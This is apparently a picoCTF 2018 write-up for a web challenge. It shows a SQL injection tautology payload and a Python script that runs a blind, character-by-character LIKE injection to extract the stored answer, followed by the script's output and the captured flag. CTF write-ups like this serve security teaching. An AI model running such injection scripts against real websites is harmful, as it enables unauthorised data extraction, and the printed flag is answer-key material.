A Simple Question

Challenge

There is a website running at http://2018shell1.picoctf.com:36052 (link). Try to see if you can answer its question.

Solution

we get a form looking for an answer

if we enter a value of a we are given the SQL statement constructed and message that we were wrong.

Let’s see what happens when we enter ' or 'x'='x

ok, so we get a different message if the query returns something, this we can use. We can give an snwer like ' OR answer LIKE 'a% to test if it starts with a letter a, and build up answer like that. Since this will takea while, we script it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

import requests
import string

url="http://2018shell1.picoctf.com:36052/answer2.php"
alphabet=string.printable.replace('%','').replace("'",'')
password=''

stop = False
while not stop:
    for c in alphabet:
        params = {'answer': "' OR answer LIKE '"+password+c+"%", 'debug': '1'}
        r = requests.post(url, data=params)

        if "so close" in r.text:
            password += c
            print("letter found! "+password)
            break
        elif "Wrong" not in r.text:
            stop = True
            print(r.text)
            break

print(password)

this outputs

1
2
3
4
5
6
7
8
9
10
11
12
13
14

letter found! 4
letter found! 41
letter found! 41a
letter found! 41an
letter found! 41and
letter found! 41ands
letter found! 41andsi
letter found! 41andsix
letter found! 41andsixs
letter found! 41andsixsi
letter found! 41andsixsix
letter found! 41andsixsixt
letter found! 41andsixsixth
letter found! 41andsixsixths

but now what..? this is not the flag, nor the answer to put in the form. Nor is 42

turns out the query wasn’t case sensitive, and the answer we are looking for is 41AndSixSixths. When we put that in the form we get the flag:

1
2
3
4
5

SQL query: SELECT * FROM answers WHERE answer='41AndSixSixths'

Perfect!

Your flag is: picoCTF{qu3stions_ar3_h4rd_d3850719}

Flag